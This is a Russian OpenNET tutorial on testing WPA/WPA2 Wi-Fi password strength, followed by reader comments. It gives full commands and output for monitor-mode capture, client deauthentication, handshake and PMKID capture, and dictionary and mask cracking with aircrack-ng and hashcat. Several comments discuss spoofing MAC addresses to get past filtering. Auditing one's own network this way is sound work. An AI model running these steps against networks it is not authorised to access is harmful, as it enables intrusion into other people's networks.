The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

Проверка безопасности беспроводной сети WPA/WPA2 при помощи Aircrack-ng и Hashcat
Беспроводные сети на базе WPA/WPA2 не подвержены прямым методам атаки, но
злоумышленник может получить доступ к системам, на которых установлен
недостаточно надёжный пароль. Нижеприведённая инструкция позволяет проверить
свои системы на предмет стойкости к атаке по типовому словарю паролей.
Предлагается два метода восстановления пароля по перехваченному в трафике хэшу
- при помощи  Aircrack-ng и  Hashcat.

Устанавливаем Aircrack-ng:

   sudo apt-get install aircrack-ng

Определяем, поддерживает ли беспроводная карта режим мониторинга
(http://aircrack-ng.org/doku.php?id=compatible_cards - выбор поддерживаемых
плат), на выходе будет список сетевых интерфейсов для которых имеется подобная поддержка:

   airmon-ng

Переводим беспроводную плату в режим мониторинга:

   airmon-ng start wlan0

Отслеживаем все проходящие в эфире кадры на предмет идентификаторов
беспроводной сети (BSSID)  и используемых номеров каналов.

   airodump-ng mon0

   BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
   9C:5E:8A:C9:AB:C0  -81       19        0    0   6  54e  WPA2 CCMP   PSK  mywifi
   ...

Определив, что наша сеть имеет BSSID 9C:5E:8A:C9:AB:C0 и 6 канал, отслеживаем и
сохраняем в файл capture/-01.cap трафик пакетов, связанных с согласованием
нового соединения (ждём пока появится надпись "WPA handshake" и прерываем
перехват по ctrl-c):

   airodump-ng -c 6 --bssid 9C:5E:8A:C9:AB:C0 -w capture/ mon0

Для того, чтобы не ждать долго инициируем обрыв соединения у подключенных
клиентов (64:BC:0C:49:87:F7 - идентификатор клиента):

   airodump-ng -c 6 --bssid 9C:5E:8A:C9:AB:C0 mon0

   BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                 
   9C:5E:8A:C9:AB:C0  64:BC:0C:49:87:F7  -37    1e- 1e     4     6479  ASUS

   aireplay-ng -0 10 -a 9C:5E:8A:C9:AB:C0 -c 64:BC:0C:49:87:F7 mon0


Загружаем  словарь с примерами паролей (размер 134MB, около 14 млн типовых паролей):

   curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

Запускаем  aircrack-ng в режиме подбора хэша пароля по словарю (подбор
выполняется только на CPU, без привлечения GPU):

   aircrack-ng -a2 -b 9C:5E:8A:C9:AB:C0 -w rockyou.txt capture/-01.cap

Или используем для этого naive-hashcat (более эффективен при наличии доступа
к GPU), предварительно преобразовав cap-дамп в формат hccapx при помощи утилиты
cap2hccapx:

   cap2hccapx.bin capture/-01.cap capture/-01.hccapx
   HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh



Дополнение: 

Опубликован новый  метод атаки, 
который не требует ожидания подключения к сети нового пользователя и сохранения всей активности, 
связанной с установкой им соединения. Для получения данных, достаточных для начала 
подбора пароля, новый метод требует перехвата лишь одного кадра, который можно получить 
в любое время, отправив запрос аутентификации к точке доступа. 

Для проведения атаки требуются свежие версии:
* hcxdumptool
* hcxtools
* hashcat


Запускаем hcxdumptool, отправляем запрос к точке доступа для получения PMKID 
и сохраняем результат в файл в формате pcapng:

   ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

    start capturing (stop with ctrl+c)
    INTERFACE:...............: wlp39s0f3u4u5
    FILTERLIST...............: 0 entries
    MAC CLIENT...............: 89acf0e761f4 (client)
    MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
    EAPOL TIMEOUT............: 20000
    DEAUTHENTICATIONINTERVALL: 10 beacons
    GIVE UP DEAUTHENTICATIONS: 20 tries
    REPLAYCOUNTER............: 62083
    .... 
    [13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e  [ASSOCIATIONREQUEST, SEQUENCE 4]
    [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
    [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]

В случае если точка доступа поддерживает отправку PMKID будет выведено сообщение "FOUND PMKID". 
Из-за помех перехват может не получиться с первого раза, поэтому рекомендуется 
запускать hcxdumptool в течение приблизительно 10 минут.

Запускаем утилиту hcxpcaptool для преобразования перехваченного дампа из
формата pcapng в формат для разбора в hashcat.


   ./hcxpcaptool -z test.16800 test.pcapng

    start reading from test.pcapng

    summary:
    --------
    file name....................: test.pcapng
    file type....................: pcapng 1.0
    file hardware information....: x86_64
    file os information..........: Linux 4.17.11-arch1
    file application information.: hcxdumptool 4.2.0
    network type.................: DLT_IEEE802_11_RADIO (127)
    endianess....................: little endian
    read errors..................: flawless
    packets inside...............: 66
    skipped packets..............: 0
    packets with FCS.............: 0
    beacons (with ESSID inside)..: 17
    probe requests...............: 1
    probe responses..............: 11
    association requests.........: 5
    association responses........: 5
    authentications (OPEN SYSTEM): 13
    authentications (BROADCOM)...: 1
    EAPOL packets................: 14
    EAPOL PMKIDs.................: 1

    1 PMKID(s) written to test.16800

Содержимое записанного файла включает строки вида
"2582a81d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465af3a", которые содержат 
шестнадцатеричные значения PMKID, MAC AP,MAC Station и ESSID.

Дополнительно при запуске hcxpcaptool можно использовать опции "-E", "-I" и '-U" 
для анализа наличия паролей, идентификаторов и имён пользователей в беспроводном трафике:


   ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

Запускаем hashcat для подбора пароля (применяется режим 16800):


   ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

    hashcat (v4.2.0) starting...

    OpenCL Platform #1: NVIDIA Corporation
    ======================================
    * Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU
    * Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
    * Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
    * Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU

    Hashes: 1 digests; 1 unique digests, 1 unique salts
    Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

    Applicable optimizers:
    * Zero-Byte
    * Single-Hash
    * Single-Salt
    * Brute-Force
    * Slow-Hash-SIMD-LOOP

    Minimum password length supported by kernel: 8
    Maximum password length supported by kernel: 63

    Watchdog: Temperature abort trigger set to 90c

    2582573161c61*4604d4e*89acf0e761f4*ed4824639f3a:hashcat!

    Session..........: hashcat
    Status...........: Cracked
    Hash.Type........: WPA-PMKID-PBKDF2
    Hash.Target......: 2582a8281d0e61c61*4604ba734d4e*89acf...a39f3a
    Time.Started.....: Sun Aug 12 12:51:38 2018 (41 secs)
    Time.Estimated...: Sun Aug 12 12:52:19 2018 (0 secs)
    Guess.Mask.......: ?l?l?l?l?l?lt! [8]
    Guess.Queue......: 1/1 (100.00%)
    Speed.Dev.#1.....:   408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#2.....:   408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#3.....:   412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#4.....:   410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#*.....:  1641.3 kH/s
    Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
    Progress.........: 66846720/308915776 (21.64%)
    Rejected.........: 0/66846720 (0.00%)
    Restore.Point....: 0/11881376 (0.00%)
    Candidates.#1....: hariert! -> hhzkzet!
    Candidates.#2....: hdtivst! -> hzxkbnt!
    Candidates.#3....: gnxpwet! -> gwqivst!
    Candidates.#4....: gxhcddt! -> grjmrut!
    HWMon.Dev.#1.....: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1
    HWMon.Dev.#2.....: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1
    HWMon.Dev.#3.....: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1
    HWMon.Dev.#4.....: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1
 
25.07.2017 , Источник: https://github.com/brannondorsey/wi...
Ключи: wpa, wpa2, wifi, aircrack-ng, hashcat / Лицензия: CC-BY
Раздел:    Корень / Администратору / Сетевая подсистема, маршрутизация / Wifi, настройка беспроводного доступа

Обсуждение [ Линейный режим | Показать все | RSS ]
  • 1.5, Аноним (5), 02:44, 27/07/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Просмотрел что пользуются паролями по словарю, дальше не интересно) Мои 25 не подберут. хотя недавно пришлось к сети подключать принтер, за...ся пока вбил пароль.
     
     
  • 2.6, cmp (ok), 06:28, 27/07/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Хе, а у меня 32 - мд5 какой-то лабуды, ноут проще проводом воткнуть и скопировать, а на телефон смс отправить
     
     
  • 3.7, PuskatelSheptunov (?), 00:03, 28/07/2017 [^] [^^] [^^^] [ответить]  
  • +/
    я параноик? у меня 63, или вы из соседних палат?
     
     
  • 4.23, sabakka (?), 23:44, 01/09/2017 [^] [^^] [^^^] [ответить]  
  • +/
    у меня 20см.
     
  • 4.25, Аноним (-), 13:18, 21/09/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Мы с вами из одной палаты, коллега.
     
  • 4.27, Аноним (-), 13:30, 15/10/2017 [^] [^^] [^^^] [ответить]  
  • +/
    А у меня 64 символа...
     
  • 2.8, AdVv (ok), 10:21, 28/07/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > Просмотрел что пользуются паролями по словарю, дальше не интересно) Мои 25 не
    > подберут. хотя недавно пришлось к сети подключать принтер, за...ся пока вбил
    > пароль.

    Главное WPS не выключайте !

     

  • 1.9, 123 (??), 04:11, 31/07/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Ставим пароль 12345678 и лочим по макам устройства. Хоть и есть в словаре, но отсеим 95% хакеров-любителей.
     
     
  • 2.10, Аноним (-), 09:25, 02/08/2017 [^] [^^] [^^^] [ответить]  
  • +/
    ты идиот? там видно при скане маки подключеных устройств, я могу твой мак вписать себе, вот ты лох.
     
  • 2.11, Аноним (-), 08:35, 04/08/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > Ставим пароль 12345678 и лочим по макам устройства. Хоть и есть в
    > словаре, но отсеим 95% хакеров-любителей.

    Если бы ты хоть что-то понимал в безопасности то догадался бы что сменить мак значительно проще чем сломать пароль, даже такой. И требования к оборудованию/ос намного меньше. Поэтому фильтр по маку - вообще не защита. Ну разве что если ты сам точкой пользоваться не будешь совсем, предоставив атакующему подбирать весь диапазон маков. Но если ты такой стебщик, проще поставить открытую точку доступа которая никуда не подключена. Или подключена через какой-нибудь очень хитро настроенный файрфол, чтобы пролезал только какой-нибудь днс туннель и более нифига.

     
     
  • 3.12, Аноним (-), 21:55, 04/08/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Речь о хакерах любителях же. ну улыбнитесь хоть.
    Вот ты будешь подменять маки устройств в сети во время перебора паролей? Сеть будет лагать, люди будут дергать шнур роутера и т д.
     
     
  • 4.18, Аноним (-), 22:03, 21/08/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Ты не поверишь - сканить будут днём, а подменять мак ночью.
     
  • 4.22, Аноним (-), 04:42, 28/08/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > Вот ты будешь подменять маки устройств в сети во время перебора паролей?

    Если сеть по другому не пускает - без вариантов.

    > Сеть будет лагать, люди будут дергать шнур роутера и т д.

    Зависит требуется ли скрытность. Если да - подождать пока какой-нибудь клиент угомонится, и тогда.

     

  • 1.13, Аноним (-), 21:57, 04/08/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Огласите время перебора среднего пароля из 10 символов на квантовом компьютере, а то не усну.
    Как заставить точку допускать одну аунтификацию в секунду, например? Микротик может?
     
     
  • 2.14, Anonimous (?), 22:58, 07/08/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Можно в metarouter поднять openwrt/lede с radius и поставить ему ограничения.
     
     
  • 3.28, MatrixHasYou (?), 07:17, 10/11/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > Можно в metarouter поднять openwrt/lede с radius и поставить ему ограничения.

    Ага, а можно в вашей Виндовс поставить виртуалбокс и поднять там хакинтош чтобы ткнуть на красивую иконочку.

    ps вы все равно не поймете, но как раз над кнопочкой metarouter есть кнопочка radius коли он вам так нужен

     
  • 2.15, Аноним (-), 03:27, 17/08/2017 [^] [^^] [^^^] [ответить]  
  • +/
    Ну что, все еще не уснул?
     
     
  • 3.19, Аноним (-), 22:04, 21/08/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > Ну что, все еще не уснул?

    Давайте не дадим спать болезному полгода? Пусть он примет книгу рекордов.

     
     
  • 4.26, ыпр (?), 18:21, 14/10/2017 [^] [^^] [^^^] [ответить]  
  • +/
    внутривенно? :)
     

  • 1.16, Kuromi (?), 01:20, 19/08/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    "Переводим беспроводную плату в режим мониторинга:

       airmon-ng start wlan0"

    Ага, а что, любую карту так можно? раньше помнится были списки чипсетов которые такое позволяли...

     
     
  • 2.20, Аноним (-), 22:05, 21/08/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > Ага, а что, любую карту так можно?

    Любую из списка. Ты новость вообще читал?

     

  • 1.17, лютый жабист__ (?), 08:33, 20/08/2017 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    Спасибо за статью! Не знал, что так всё просто.
     
     
  • 2.21, Аноним (21), 22:51, 23/08/2017 [^] [^^] [^^^] [ответить]  
  • +/
    а слабо было "iwconfig wlan0 mode Monitor" попробовать ? Тут нелинуксоиды вопросы оставляют с хитрым словом "чипсет" ???
     
  • 2.24, Аноним (-), 18:35, 10/09/2017 [^] [^^] [^^^] [ответить]  
  • +/
    > Не знал, что так всё просто.

    Знал, что так всё не просто.

     
     
  • 3.29, Аноним (29), 13:42, 12/08/2018 [^] [^^] [^^^] [ответить]  
  • +/
    Знал, что не всё так просто.
     


     Добавить комментарий
    Имя:
    E-Mail:
    Заголовок:
    Текст:




    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру